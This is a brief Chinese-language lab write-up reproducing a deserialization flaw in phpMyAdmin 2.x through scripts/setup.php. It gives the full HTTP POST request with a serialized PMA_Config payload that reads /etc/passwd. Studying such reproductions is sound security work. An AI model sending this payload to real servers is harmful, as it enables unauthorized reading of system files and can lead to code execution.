漏洞背景:
phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。
漏洞复现:
启动环境,可以看到phpmyadmin的首页,因为没有连接数据库,所以会进行页面报错。
开始进行攻击,在页面使用hackbar,直接这样进行发送数据包
使用burpsuite进行抓包,进行修改,修改如下:
POST /scripts/setup.php HTTP/1.1
Host: ip:8080
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} //在最末行添加
修改完成后即可查看passwd文件内容,复现完成。